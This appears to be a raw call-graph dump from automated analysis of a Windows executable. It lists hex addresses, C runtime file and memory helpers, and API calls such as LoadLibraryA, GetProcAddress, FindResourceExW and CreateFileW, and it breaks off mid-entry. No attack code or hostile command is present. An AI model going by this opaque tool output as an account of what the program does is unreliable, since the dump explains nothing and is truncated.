11d48a 98667->98669 98670 10313d _W_store_winword 60 API calls 98668->98670 98671 e3ee2 59 API calls 98669->98671 98672 e38c3 98670->98672 98673 11d497 98671->98673 98672->98647 98674 e38cd 98672->98674 98673->98673 98675 10313d _W_store_winword 60 API calls 98674->98675 98676 e38d8 98675->98676 98676->98662 98677 e3919 98676->98677 98679 e3ee2 59 API calls 98676->98679 98677->98662 98678 e3926 98677->98678 98899 e942e 98678->98899 98681 e38fc 98679->98681 98683 e81a7 59 API calls 98681->98683 98684 e390a 98683->98684 98686 e3ee2 59 API calls 98684->98686 98686->98677 98689 e93ea 59 API calls 98691 e3961 98689->98691 98690 e9040 60 API calls 98690->98691 98691->98689 98691->98690 98692 e3ee2 59 API calls 98691->98692 98693 e39a7 Mailbox 98691->98693 98692->98691 98693->98563 98695 e73f2 __write_nolock 98694->98695 98696 e740b 98695->98696 98697 11ee4b _memset 98695->98697 98698 e48ae 60 API calls 98696->98698 98700 11ee67 GetOpenFileNameW 98697->98700 98699 e7414 98698->98699 99776 1009d5 98699->99776 98701 11eeb6 98700->98701 98703 e7d2c 59 API calls 98701->98703 98705 11eecb 98703->98705 98705->98705 98707 e7429 99794 e69ca 98707->99794 98711 f0a9a __write_nolock 98710->98711 100096 e6ee0 98711->100096 98713 f0a9f 98725 e3c26 98713->98725 100107 f12fe 89 API calls 98713->100107 98715 f0aac 98715->98725 100108 f4047 91 API calls Mailbox 98715->100108 98717 f0ab5 98718 f0ab9 GetFullPathNameW 98717->98718 98717->98725 98719 e7d2c 59 API calls 98718->98719 98720 f0ae5 98719->98720 98721 e7d2c 59 API calls 98720->98721 98722 f0af2 98721->98722 98723 1250d5 _wcscat 98722->98723 98724 e7d2c 59 API calls 98722->98724 98724->98725 98725->98573 98725->98581 98727 e3ac2 LoadImageW RegisterClassExW 98726->98727 98728 11d49c 98726->98728 100151 e3041 7 API calls 98727->100151 100152 e48fe LoadImageW EnumResourceNamesW 98728->100152 98731 e3b46 98733 e39e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98731->98733 98732 11d4a5 98733->98589 98823->98573 98824->98586 98835 e3d50 __write_nolock 98834->98835 98836 e7d2c 59 API calls 98835->98836 98838 e3eb6 Mailbox 98835->98838 98839 e3d82 98836->98839 98838->98617 98847 e3db8 Mailbox 98839->98847 98960 e7b52 98839->98960 98840 e3e89 98840->98838 98841 e7f41 59 API calls 98840->98841 98843 e3eaa 98841->98843 98842 e7f41 59 API calls 98842->98847 98844 e3f84 59 API calls 98843->98844 98844->98838 98845 e3f84 59 API calls 98845->98847 98846 e7b52 59 API calls 98846->98847 98847->98838 98847->98840 98847->98842 98847->98845 98847->98846 98963 e4d13 98848->98963 98853 e4f68 LoadLibraryExW 98973 e4cc8 98853->98973 98854 11dd0f 98855 e4faa 84 API calls 98854->98855 98857 11dd16 98855->98857 98859 e4cc8 3 API calls 98857->98859 98861 11dd1e 98859->98861 98999 e506b 98861->98999 98862 e4f8f 98862->98861 98863 e4f9b 98862->98863 98864 e4faa 84 API calls 98863->98864 98866 e37e6 98864->98866 98866->98624 98866->98625 98869 11dd45 99007 e5027 98869->99007 98871 11dd52 98873 e3801 98872->98873 98874 e81b2 98872->98874 98876 e93ea 98873->98876 99434 e80d7 59 API calls 2 library calls 98874->99434 98877 100ff6 Mailbox 59 API calls 98876->98877 98878 e380d 98877->98878 98878->98638 98880 e862b 98879->98880 98882 e8652 98880->98882 99435 e8b13 69 API calls Mailbox 98880->99435 98882->98642 98884 e3eec 98883->98884 98885 e3f05 98883->98885 98886 e81a7 59 API calls 98884->98886 98887 e7d2c 59 API calls 98885->98887 98888 e388b 98886->98888 98887->98888 98889 10313d 98888->98889 98890 103149 98889->98890 98891 1031be 98889->98891 98898 10316e 98890->98898 99436 108d68 58 API calls __getptd_noexit 98890->99436 99438 1031d0 60 API calls 3 library calls 98891->99438 98893 1031cb 98893->98663 98895 103155 99437 108ff6 9 API calls __fclose_nolock 98895->99437 98897 103160 98897->98663 98898->98663 98900 e9436 98899->98900 98901 100ff6 Mailbox 59 API calls 98900->98901 98902 e9444 98901->98902 98903 e3936 98902->98903 99439 e935c 59 API calls Mailbox 98902->99439 98905 e91b0 98903->98905 99440 e92c0 98905->99440 98907 e91bf 98908 100ff6 Mailbox 59 API calls 98907->98908 98909 e3944 98907->98909 98908->98909 98910 e9040 98909->98910 98911 11f5a5 98910->98911 98915 e9057 98910->98915 98911->98915 99450 e8d3b 59 API calls Mailbox 98911->99450 98913 e9158 98916 100ff6 Mailbox 59 API calls 98913->98916 98914 e91a0 99449 e9e9c 60 API calls Mailbox 98914->99449 98915->98913 98915->98914 98918 e915f 98915->98918 98916->98918 98918->98691 98920 e5045 85 API calls 98919->98920 98921 149854 98920->98921 99451 1499be 98921->99451 98924 e506b 74 API calls 98925 149881 98924->98925 98926 e506b 74 API calls 98925->98926 98927 149891 98926->98927 98928 e506b 74 API calls 98927->98928 98929 1498ac 98928->98929 98930 e506b 74 API calls 98929->98930 98931 1498c7 98930->98931 98932 e5045 85 API calls 98931->98932 98933 1498de 98932->98933 98934 10594c __malloc_crt 58 API calls 98933->98934 98935 1498e5 98934->98935 98936 10594c __malloc_crt 58 API calls 98935->98936 98937 1498ef 98936->98937 98938 e506b 74 API calls 98937->98938 98939 149903 98938->98939 98940 149393 GetSystemTimeAsFileTime 98939->98940 98941 149916 98940->98941 98942 149940 98941->98942 98943 14992b 98941->98943 98945 1499a5 98942->98945 98946 149946 98942->98946 98944 102f95 _free 58 API calls 98943->98944 98948 149931 98944->98948 98947 102f95 _free 58 API calls 98945->98947 99457 148d90 98946->99457 98952 11d3c1 98947->98952 98950 102f95 _free 58 API calls 98948->98950 98950->98952 98952->98628 98954 e4faa 98952->98954 98953 102f95 _free 58 API calls 98953->98952 98955 e4fb4 98954->98955 98957 e4fbb 98954->98957 98956 1055d6 __fcloseall 83 API calls 98955->98956 98956->98957 98958 e4fca 98957->98958 98959 e4fdb FreeLibrary 98957->98959 98958->98628 98959->98958 98961 e7faf 59 API calls 98960->98961 98962 e7b5d 98961->98962 98962->98839 99012 e4d61 98963->99012 98966 e4d4a FreeLibrary 98967 e4d53 98966->98967 98970 10548b 98967->98970 98968 e4d61 2 API calls 98969 e4d3a 98968->98969 98969->98966 98969->98967 99016 1054a0 98970->99016 98972 e4f5c 98972->98853 98972->98854 99174 e4d94 98973->99174 98976 e4ced 98978 e4cff FreeLibrary 98976->98978 98979 e4d08 98976->98979 98977 e4d94 2 API calls 98977->98976 98978->98979 98980 e4dd0 98979->98980 98981 100ff6 Mailbox 59 API calls 98980->98981 98982 e4de5 98981->98982 98983 e538e 59 API calls 98982->98983 98984 e4df1 _memmove 98983->98984 98985 e4e2c 98984->98985 98987 e4ee9 98984->98987 98988 e4f21 98984->98988 98986 e5027 69 API calls 98985->98986 98995 e4e35 98986->98995 99178 e4fe9 CreateStreamOnHGlobal 98987->99178 99189 149ba5 95 API calls 98988->99189 98991 e506b 74 API calls 98991->98995 98993 e4ec9 98993->98862 98994 11dcd0 98996 e5045 85 API calls 98994->98996 98995->98991 98995->98993 98995->98994 99184 e5045 98995->99184 98997 11dce4 98996->98997 98998 e506b 74 API calls 98997->98998 98998->98993 99000 e507d 98999->99000 99001 11ddf6 98999->99001 99213 105812 99000->99213 99004 149393 99411 1491e9 99004->99411 99006 1493a9 99006->98869 99008 e5036 99007->99008 99011 11ddb9 99007->99011 99416 105e90 99008->99416 99010 e503e 99010->98871 99013 e4d2e 99012->99013 99014 e4d6a LoadLibraryA 99012->99014 99013->98968 99013->98969 99014->99013 99015 e4d7b GetProcAddress 99014->99015 99015->99013 99018 1054ac __alloc_osfhnd 99016->99018 99017 1054bf 99065 108d68 58 API calls __getptd_noexit 99017->99065 99018->99017 99021 1054f0 99018->99021 99020 1054c4 99066 108ff6 9 API calls __fclose_nolock 99020->99066 99035 110738 99021->99035 99024 1054f5 99025 10550b 99024->99025 99026 1054fe 99024->99026 99028 105535 99025->99028 99029 105515 99025->99029 99067 108d68 58 API calls __getptd_noexit 99026->99067 99050 110857 99028->99050 99068 108d68 58 API calls __getptd_noexit 99029->99068 99034 1054cf __alloc_osfhnd @_EH4_CallFilterFunc@8 99034->98972 99036 110744 __alloc_osfhnd 99035->99036 99037 109e4b __lock 58 API calls 99036->99037 99047 110752 99037->99047 99038 1107c6 99070 11084e 99038->99070 99039 1107cd 99075 108a5d 58 API calls __malloc_crt 99039->99075 99042 110843 __alloc_osfhnd 99042->99024 99043 1107d4 99043->99038 99076 10a06b InitializeCriticalSectionAndSpinCount 99043->99076 99046 109ed3 __mtinitlocknum 58 API calls 99046->99047 99047->99038 99047->99039 99047->99046 99073 106e8d 59 API calls __lock 99047->99073 99074 106ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99047->99074 99048 1107fa EnterCriticalSection 99048->99038 99058 110877 __wopenfile 99050->99058 99051 110891 99081 108d68 58 API calls __getptd_noexit 99051->99081 99053 110896 99082 108ff6 9 API calls __fclose_nolock 99053->99082 99055 105540 99069 105562 LeaveCriticalSection LeaveCriticalSection __wfsopen 99055->99069 99056 110aaf 99078 1187f1 99056->99078 99058->99051 99058->99058 99064 110a4c 99058->99064 99083 103a0b 60 API calls 2 library calls 99058->99083 99060 110a45 99060->99064 99084 103a0b 60 API calls 2 library calls 99060->99084 99062 110a64 99062->99064 99085 103a0b 60 API calls 2 library calls 99062->99085 99064->99051 99064->99056 99065->99020 99066->99034 99067->99034 99068->99034 99069->99034 99077 109fb5 LeaveCriticalSection 99070->99077 99072 110855 99072->99042 99073->99047 99074->99047 99075->99043 99076->99048 99077->99072 99086 117fd5 99078->99086 99080 11880a 99080->99055 99081->99053 99082->99055 99083->99060 99084->99062 99085->99064 99089 117fe1 __alloc_osfhnd 99086->99089 99087 117ff7 99171 108d68 58 API calls __getptd_noexit 99087->99171 99089->99087 99091 11802d 99089->99091 99090 117ffc 99172 108ff6 9 API calls __fclose_nolock 99090->99172 99097 11809e 99091->99097 99094 118049 99173 118072 LeaveCriticalSection __unlock_fhandle 99094->99173 99096 118006 __alloc_osfhnd 99096->99080 99098 1180be 99097->99098 99099 10471a __wsopen_nolock 58 API calls 99098->99099 99102 1180da 99099->99102 99100 109006 __invoke_watson 8 API calls 99101 1187f0 99100->99101 99103 117fd5 __wsopen_helper 103 API calls 99101->99103 99104 118114 99102->99104 99111 118137 99102->99111 99146 118211 99102->99146 99105 11880a 99103->99105 99106 108d34 __write_nolock 58 API calls 99104->99106 99105->99094 99107 118119 99106->99107 99108 108d68 __fclose_nolock 58 API calls 99107->99108 99109 118126 99108->99109 99110 108ff6 __fclose_nolock 9 API calls 99109->99110 99136 118130 99110->99136 99112 1181f5 99111->99112 99118 1181d3 99111->99118 99113 108d34 __write_nolock 58 API calls 99112->99113 99114 1181fa 99113->99114 99115 108d68 __fclose_nolock 58 API calls 99114->99115 99116 118207 99115->99116 99117 108ff6 __fclose_nolock 9 API calls 99116->99117 99117->99146 99119 10d4d4 __alloc_osfhnd 61 API calls 99118->99119 99120 1182a1 99119->99120 99121 1182ab 99120->99121 99122 1182ce 99120->99122 99124 108d34 __write_nolock 58 API calls 99121->99124 99123 117f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99122->99123 99126 1182f0 99123->99126 99125 1182b0 99124->99125 99128 108d68 __fclose_nolock 58 API calls 99125->99128 99127 11836e GetFileType 99126->99127 99131 11833c GetLastError 99126->99131 99138 117f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99126->99138 99129 118379 GetLastError 99127->99129 99130 1183bb 99127->99130 99132 1182ba 99128->99132 99133 108d47 __dosmaperr 58 API calls 99129->99133 99142 10d76a __set_osfhnd 59 API calls 99130->99142 99134 108d47 __dosmaperr 58 API calls 99131->99134 99135 108d68 __fclose_nolock 58 API calls 99132->99135 99137 1183a0 CloseHandle 99133->99137 99139 118361 99134->99139 99135->99136 99136->99094 99137->99139 99140 1183ae 99137->99140 99141 118331 99138->99141 99144 108d68 __fclose_nolock 58 API calls 99139->99144 99143 108d68 __fclose_nolock 58 API calls 99140->99143 99141->99127 99141->99131 99148 1183d9 99142->99148 99145 1183b3 99143->99145 99144->99146 99145->99139 99146->99100 99147 118594 99147->99146 99150 118767 CloseHandle 99147->99150 99148->99147 99149 111b11 __lseeki64_nolock 60 API calls 99148->99149 99165 11845a 99148->99165 99151 118443 99149->99151 99152 117f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99150->99152 99154 108d34 __write_nolock 58 API calls 99151->99154 99151->99165 99153 11878e 99152->99153 99155 118796 GetLastError 99153->99155 99156 1187c2 99153->99156 99154->99165 99157 108d47 __dosmaperr 58 API calls 99155->99157 99156->99146 99158 1187a2 99157->99158 99162 10d67d __free_osfhnd 59 API calls 99158->99162 99159 110d2d __close_nolock 61 API calls 99159->99165 99160 1110ab 70 API calls __read_nolock 99160->99165 99161 11848c 99163 1199f2 __chsize_nolock 82 API calls 99161->99163 99161->99165 99162->99156 99163->99161 99164 10dac6 __write 78 API calls 99164->99165 99165->99147 99165->99159 99165->99160 99165->99161 99165->99164 99166 118611 99165->99166 99169 111b11 60 API calls __lseeki64_nolock 99165->99169 99167 110d2d __close_nolock 61 API calls 99166->99167 99168 118618 99167->99168 99170 108d68 __fclose_nolock 58 API calls 99168->99170 99169->99165 99170->99146 99171->99090 99172->99096 99173->99096 99175 e4ce1 99174->99175 99176 e4d9d LoadLibraryA 99174->99176 99175->98976 99175->98977 99176->99175 99177 e4dae GetProcAddress 99176->99177 99177->99175 99179 e5003 FindResourceExW 99178->99179 99183 e5020 99178->99183 99180 11dd5c LoadResource 99179->99180 99179->99183 99181 11dd71 SizeofResource 99180->99181 99180->99183 99182 11dd85 LockResource 99181->99182 99181->99183 99182->99183 99183->98985 99185 11ddd4 99184->99185 99186 e5054 99184->99186 99190 105a7d 99186->99190 99188 e5062 99188->98995 99189->98985 99194 105a89 __alloc_osfhnd 99190->99194 99191 105a9b 99203 108d68 58 API calls __getptd_noexit 99191->99203 99193 105ac1 99205 106e4e 99193->99205 99194->99191 99194->99193 99195 105aa0 99204 108ff6 9 API calls __fclose_nolock 99195->99204 99198 105ac7 99211 1059ee 83 API calls 4 library calls 99198->99211 99200 105ad6 99212 105af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 99200->99212 99202 105aab __alloc_osfhnd 99202->99188 99203->99195 99204->99202 99206 106e80 EnterCriticalSection 99205->99206 99207 106e5e 99205->99207 99208 106e76 99206->99208 99207->99206 99209 106e66 99207->99209 99208->99198 99210 109e4b __lock 58 API calls 99209->99210 99210->99208 99211->99200 99212->99202 99216 10582d 99213->99216 99215 e508e 99215->99004 99217 105839 __alloc_osfhnd 99216->99217 99218 10587c 99217->99218 99219 10584f _memset 99217->99219 99220 105874 __alloc_osfhnd 99217->99220 99221 106e4e __lock_file 59 API calls 99218->99221 99243 108d68 58 API calls __getptd_noexit 99219->99243 99220->99215 99222 105882 99221->99222 99229 10564d 99222->99229 99225 105869 99244 108ff6 9 API calls __fclose_nolock 99225->99244 99231 105668 _memset 99229->99231 99235 105683 99229->99235 99230 105673 99341 108d68 58 API calls __getptd_noexit 99230->99341 99231->99230 99231->99235 99240 1056c3 99231->99240 99233 105678 99342 108ff6 9 API calls __fclose_nolock 99233->99342 99245 1058b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 99235->99245 99237 1057d4 _memset 99344 108d68 58 API calls __getptd_noexit 99237->99344 99240->99235 99240->99237 99246 104916 99240->99246 99253 1110ab 99240->99253 99321 110df7 99240->99321 99343 110f18 58 API calls 3 library calls 99240->99343 99243->99225 99244->99220 99245->99220 99247 104920 99246->99247 99248 104935 99246->99248 99345 108d68 58 API calls __getptd_noexit 99247->99345 99248->99240 99250 104925 99346 108ff6 9 API calls __fclose_nolock 99250->99346 99252 104930 99252->99240 99254 1110e3 99253->99254 99255 1110cc 99253->99255 99257 11181b 99254->99257 99260 11111d 99254->99260 99356 108d34 58 API calls __getptd_noexit 99255->99356 99372 108d34 58 API calls __getptd_noexit 99257->99372 99259 1110d1 99357 108d68 58 API calls __getptd_noexit 99259->99357 99263 111125 99260->99263 99270 11113c 99260->99270 99261 111820 99373 108d68 58 API calls __getptd_noexit 99261->99373 99358 108d34 58 API calls __getptd_noexit 99263->99358 99266 111131 99374 108ff6 9 API calls __fclose_nolock 99266->99374 99267 11112a 99359 108d68 58 API calls __getptd_noexit 99267->99359 99269 111151 99360 108d34 58 API calls __getptd_noexit 99269->99360 99270->99269 99273 11116b 99270->99273 99274 111189 99270->99274 99301 1110d8 99270->99301 99273->99269 99276 111176 99273->99276 99361 108a5d 58 API calls __malloc_crt 99274->99361 99347 115ebb 99276->99347 99277 111199 99279 1111a1 99277->99279 99280 1111bc 99277->99280 99362 108d68 58 API calls __getptd_noexit 99279->99362 99364 111b11 60 API calls 3 library calls 99280->99364 99281 11128a 99283 111303 ReadFile 99281->99283 99288 1112a0 GetConsoleMode 99281->99288 99286 1117e3 GetLastError 99283->99286 99287 111325 99283->99287 99285 1111a6 99363 108d34 58 API calls __getptd_noexit 99285->99363 99292 1117f0 99286->99292 99293 1112e3 99286->99293 99287->99286 99296 1112f5 99287->99296 99289 111300 99288->99289 99290 1112b4 99288->99290 99289->99283 99290->99289 99294 1112ba ReadConsoleW 99290->99294 99370 108d68 58 API calls __getptd_noexit 99292->99370 99303 1112e9 99293->99303 99365 108d47 58 API calls 3 library calls 99293->99365 99294->99296 99297 1112dd GetLastError 99294->99297 99296->99303 99304 11135a 99296->99304 99305 1115c7 99296->99305 99297->99293 99299 1117f5 99371 108d34 58 API calls __getptd_noexit 99299->99371 99301->99240 99302 102f95 _free 58 API calls 99302->99301 99303->99301 99303->99302 99307 1113c6 ReadFile 99304->99307 99314 111447 99304->99314 99305->99303 99311 1116cd ReadFile 99305->99311 99308 1113e7 GetLastError 99307->99308 99316 1113f1 99307->99316 99308->99316 99309 111504 99319 1114b4 MultiByteToWideChar 99309->99319 99368 111b11 60 API calls 3 library calls 99309->99368 99310 1114f4 99367 108d68 58 API calls __getptd_noexit 99310->99367 99312 1116f0 GetLastError 99311->99312 99313 1116fe 99311->99313 99312->99313 99313->99305 99369 111b11 60 API calls 3 library calls 99313->99369 99314->99303 99314->99309 99314->99310 99314->99319 99316->99304 99366 111b11 60 API calls 3 library calls 99316->99366 99319->99297 99319->99303 99322 110e02 99321->99322 99326 110e17 99321->99326 99408 108d68 58 API calls __getptd_noexit 99322->99408 99324 110e07 99409 108ff6 9 API calls __fclose_nolock 99324->99409 99327 110e4c 99326->99327 99334 110e12 99326->99334 99410 116234 58 API calls __malloc_crt 99326->99410 99329 104916 __fclose_nolock 58 API calls 99327->99329 99330 110e60 99329->99330 99375 110f97 99330->99375 99332 110e67 99333 104916 __fclose_nolock 58 API calls 99332->99333 99332->99334 99335 110e8a 99333->99335 99334->99240 99335->99334 99336 104916 __fclose_nolock 58 API calls 99335->99336 99337 110e96 99336->99337 99337->99334 99338 104916 __fclose_nolock 58 API calls 99337->99338 99339 110ea3 99338->99339 99340 104916 __fclose_nolock 58 API calls 99339->99340 99340->99334 99341->99233 99342->99235 99343->99240 99344->99233 99345->99250 99346->99252 99348 115ed3 99347->99348 99349 115ec6 99347->99349 99352 115edf 99348->99352 99353 108d68 __fclose_nolock 58 API calls 99348->99353 99350 108d68 __fclose_nolock 58 API calls 99349->99350 99351 115ecb 99350->99351 99351->99281 99352->99281 99354 115f00 99353->99354 99355 108ff6 __fclose_nolock 9 API calls 99354->99355 99355->99351 99356->99259 99357->99301 99358->99267 99359->99266 99360->99267 99361->99277 99362->99285 99363->99301 99364->99276 99365->99303 99366->99316 99367->99303 99368->99319 99369->99313 99370->99299 99371->99303 99372->99261 99373->99266 99374->99301 99376 110fa3 __alloc_osfhnd 99375->99376 99377 110fb0 99376->99377 99378 110fc7 99376->99378 99379 108d34 __write_nolock 58 API calls 99377->99379 99380 11108b 99378->99380 99383 110fdb 99378->99383 99382 110fb5 99379->99382 99381 108d34 __write_nolock 58 API calls 99380->99381 99384 110ffe 99381->99384 99385 108d68 __fclose_nolock 58 API calls 99382->99385 99386 111006 99383->99386 99387 110ff9 99383->99387 99394 108d68 __fclose_nolock 58 API calls 99384->99394 99390 110fbc __alloc_osfhnd 99385->99390 99388 111013 99386->99388 99389 111028 99386->99389 99391 108d34 __write_nolock 58 API calls 99387->99391 99392 108d34 __write_nolock 58 API calls 99388->99392 99393 10d446 ___lock_fhandle 59 API calls 99389->99393 99390->99332 99391->99384 99395 111018 99392->99395 99396 11102e 99393->99396 99397 111020 99394->99397 99398 108d68 __fclose_nolock 58 API calls 99395->99398 99399 111041 99396->99399 99400 111054 99396->99400 99402 108ff6 __fclose_nolock 9 API calls 99397->99402 99398->99397 99401 1110ab __read_nolock 70 API calls 99399->99401 99403 108d68 __fclose_nolock 58 API calls 99400->99403 99404 11104d 99401->99404 99402->99390 99405 111059 99403->99405 99407 111083 __read LeaveCriticalSection 99404->99407 99406 108d34 __write_nolock 58 API calls 99405->99406 99406->99404 99407->99390 99408->99324 99409->99334 99410->99327 99414 10543a GetSystemTimeAsFileTime 99411->99414 99413 1491f8 99413->99006 99415 105468 __aulldiv 99414->99415 99415->99413 99417 105e9c __alloc_osfhnd 99416->99417 99418 105ec3 99417->99418 99419 105eae 99417->99419 99421 106e4e __lock_file 59 API calls 99418->99421 99430 108d68 58 API calls __getptd_noexit 99419->99430 99423 105ec9 99421->99423 99422 105eb3 99431 108ff6 9 API calls __fclose_nolock 99422->99431 99432 105b00 67 API calls 5 library calls 99423->99432 99426 105ed4 99433 105ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99426->99433 99428 105ee6 99429 105ebe __alloc_osfhnd 99428->99429 99429->99010 99430->99422 99431->99429 99432->99426 99433->99428 99434->98873 99435->98882 99436->98895 99437->98897 99438->98893 99439->98903 99441 e92c9 Mailbox 99440->99441 99442 11f5c8 99441->99442 99447 e92d3 99441->99447 99443 100ff6 Mailbox 59 API calls 99442->99443 99446 11f5d4 99443->99446 99444 e92da 99444->98907 99446->99446 99447->99444 99448 e9df0 59 API calls Mailbox 99447->99448 99448->99447 99449->98918 99450->98915 99454 1499d2 __tzset_nolock _wcscmp 99451->99454 99452 149393 GetSystemTimeAsFileTime 99452->99454 99453 e506b 74 API calls 99453->99454 99454->99452 99454->99453 99455 149866 99454->99455 99456 e5045 85 API calls 99454->99456 99455->98924 99455->98952 99456->99454 99458 148d9b 99457->99458 99460 148da9 99457->99460 99459 10548b 115 API calls 99458->99459 99459->99460 99461 148dee 99460->99461 99462 10548b 115 API calls 99460->99462 99484 148db2 99460->99484 99488 14901b 99461->99488 99464 148dd3 99462->99464 99464->99461 99466 148ddc 99464->99466 99465 148e32 99467 148e36 99465->99467 99468 148e57 99465->99468 99469 1055d6 __fcloseall 83 API calls 99466->99469 99466->99484 99471 148e43 99467->99471 99473 1055d6 __fcloseall 83 API calls 99467->99473 99492 148c33 99468->99492 99469->99484 99476 1055d6 __fcloseall 83 API calls 99471->99476 99471->99484 99473->99471 99474 148e85 99501 148eb5 99474->99501 99475 148e65 99477 148e72 99475->99477 99479 1055d6 __fcloseall 83 API calls 99475->99479 99476->99484 99482 1055d6 __fcloseall 83 API calls 99477->99482 99477->99484 99479->99477 99482->99484 99484->98953 99485 148ea0 99485->99484 99487 1055d6 __fcloseall 83 API calls 99485->99487 99487->99484 99489 149040 99488->99489 99491 149029 __tzset_nolock _memmove 99488->99491 99490 105812 __fread_nolock 74 API calls 99489->99490 99490->99491 99491->99465 99493 10594c __malloc_crt 58 API calls 99492->99493 99494 148c42 99493->99494 99495 10594c __malloc_crt 58 API calls 99494->99495 99496 148c56 99495->99496 99497 10594c __malloc_crt 58 API calls 99496->99497 99498 148c6a 99497->99498 99499 148f97 58 API calls 99498->99499 99500 148c7d 99498->99500 99499->99500 99500->99474 99500->99475 99508 148eca 99501->99508 99502 148f82 99534 1491bf 99502->99534 99504 148c8f 74 API calls 99504->99508 99505 148e8c 99509 148f97 99505->99509 99508->99502 99508->99504 99508->99505 99530 14909c 99508->99530 99538 148d2b 74 API calls 99508->99538 99510 148fa4 99509->99510 99511 148faa 99509->99511 99513 102f95 _free 58 API calls 99510->99513 99512 148fbb 99511->99512 99514 102f95 _free 58 API calls 99511->99514 99515 148e93 99512->99515 99516 102f95 _free 58 API calls 99512->99516 99513->99511 99514->99512 99515->99485 99517 1055d6 99515->99517 99516->99515 99518 1055e2 __alloc_osfhnd 99517->99518 99519 1055f6 99518->99519 99520 10560e 99518->99520 99587 108d68 58 API calls __getptd_noexit 99519->99587 99523 106e4e __lock_file 59 API calls 99520->99523 99526 105606 __alloc_osfhnd 99520->99526 99522 1055fb 99588 108ff6 9 API calls __fclose_nolock 99522->99588 99525 105620 99523->99525 99571 10556a 99525->99571 99526->99485 99531 1490ab 99530->99531 99532 1490eb 99530->99532 99531->99508 99532->99531 99539 149172 99532->99539 99535 1491cc 99534->99535 99537 1491dd 99534->99537 99536 104a93 80 API calls 99535->99536 99536->99537 99537->99505 99538->99508 99540 14919e 99539->99540 99541 1491af 99539->99541 99543 104a93 99540->99543 99541->99532 99544 104a9f __alloc_osfhnd 99543->99544 99545 104ad5 99544->99545 99546 104abd 99544->99546 99548 104acd __alloc_osfhnd 99544->99548 99549 106e4e __lock_file 59 API calls 99545->99549 99568 108d68 58 API calls __getptd_noexit 99546->99568 99548->99541 99550 104adb 99549->99550 99556 10493a 99550->99556 99551 104ac2 99569 108ff6 9 API calls __fclose_nolock 99551->99569 99557 104967 99556->99557 99559 104949 99556->99559 99570 104b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 99557->99570 99558 104957 99560 108d68 __fclose_nolock 58 API calls 99558->99560 99559->99557 99559->99558 99562 104981 _memmove 99559->99562 99561 10495c 99560->99561 99563 108ff6 __fclose_nolock 9 API calls 99561->99563 99562->99557 99564 10b05e __flsbuf 78 API calls 99562->99564 99565 104c6d __flush 78 API calls 99562->99565 99566 104916 __fclose_nolock 58 API calls 99562->99566 99567 10dac6 __write 78 API calls 99562->99567 99563->99557 99564->99562 99565->99562 99566->99562 99567->99562 99568->99551 99569->99548 99570->99548 99572 105579 99571->99572 99573 10558d 99571->99573 99626 108d68 58 API calls __getptd_noexit 99572->99626 99579 105589 99573->99579 99590 104c6d 99573->99590 99575 10557e 99627 108ff6 9 API calls __fclose_nolock 99575->99627 99589 105645 LeaveCriticalSection LeaveCriticalSection __wfsopen 99579->99589 99582 104916 __fclose_nolock 58 API calls 99583 1055a7 99582->99583 99600 110c52 99583->99600 99585 1055ad 99585->99579 99586 102f95 _free 58 API calls 99585->99586 99586->99579 99587->99522 99588->99526 99589->99526 99591 104c80 99590->99591 99592 104ca4 99590->99592 99591->99592 99593 104916 __fclose_nolock 58 API calls 99591->99593 99596 110dc7 99592->99596 99594 104c9d 99593->99594 99628 10dac6 99594->99628 99597 1055a1 99596->99597 99598 110dd4 99596->99598 99597->99582 99598->99597 99599 102f95 _free 58 API calls 99598->99599 99599->99597 99601 110c5e __alloc_osfhnd 99600->99601 99602 110c82 99601->99602 99603 110c6b 99601->99603 99605 110d0d 99602->99605 99607 110c92 99602->99607 99753 108d34 58 API calls __getptd_noexit 99603->99753 99758 108d34 58 API calls __getptd_noexit 99605->99758 99606 110c70 99754 108d68 58 API calls __getptd_noexit 99606->99754 99610 110cb0 99607->99610 99611 110cba 99607->99611 99755 108d34 58 API calls __getptd_noexit 99610->99755 99614 10d446 ___lock_fhandle 59 API calls 99611->99614 99612 110cb5 99759 108d68 58 API calls __getptd_noexit 99612->99759 99616 110cc0 99614->99616 99618 110cd3 99616->99618 99619 110cde 99616->99619 99617 110d19 99760 108ff6 9 API calls __fclose_nolock 99617->99760 99738 110d2d 99618->99738 99756 108d68 58 API calls __getptd_noexit 99619->99756 99621 110c77 __alloc_osfhnd 99621->99585 99624 110cd9 99757 110d05 LeaveCriticalSection __unlock_fhandle 99624->99757 99626->99575 99627->99579 99629 10dad2 __alloc_osfhnd 99628->99629 99630 10daf6 99629->99630 99631 10dadf 99629->99631 99632 10db95 99630->99632 99634 10db0a 99630->99634 99729 108d34 58 API calls __getptd_noexit 99631->99729 99735 108d34 58 API calls __getptd_noexit 99632->99735 99638 10db32 99634->99638 99639 10db28 99634->99639 99636 10dae4 99730 108d68 58 API calls __getptd_noexit 99636->99730 99656 10d446 99638->99656 99731 108d34 58 API calls __getptd_noexit 99639->99731 99640 10db2d 99736 108d68 58 API calls __getptd_noexit 99640->99736 99641 10daeb __alloc_osfhnd 99641->99592 99644 10db38 99646 10db4b 99644->99646 99647 10db5e 99644->99647 99665 10dbb5 99646->99665 99732 108d68 58 API calls __getptd_noexit 99647->99732 99648 10dba1 99737 108ff6 9 API calls __fclose_nolock 99648->99737 99652 10db63 99733 108d34 58 API calls __getptd_noexit 99652->99733 99654 10db57 99734 10db8d LeaveCriticalSection __unlock_fhandle 99654->99734 99657 10d452 __alloc_osfhnd 99656->99657 99658 10d4a1 EnterCriticalSection 99657->99658 99660 109e4b __lock 58 API calls 99657->99660 99659 10d4c7 __alloc_osfhnd 99658->99659 99659->99644 99661 10d477 99660->99661 99662 10d48f 99661->99662 99664 10a06b __alloc_osfhnd InitializeCriticalSectionAndSpinCount 99661->99664 99663 10d4cb ___lock_fhandle LeaveCriticalSection 99662->99663 99663->99658 99664->99662 99666 10dbc2 __write_nolock 99665->99666 99667 10dc20 99666->99667 99668 10dc01 99666->99668 99698 10dbf6 99666->99698 99671 10dc78 99667->99671 99672 10dc5c 99667->99672 99670 108d34 __write_nolock 58 API calls 99668->99670 99669 10c836 __woutput_l 6 API calls 99673 10e416 99669->99673 99674 10dc06 99670->99674 99676 10dc91 99671->99676 99680 111b11 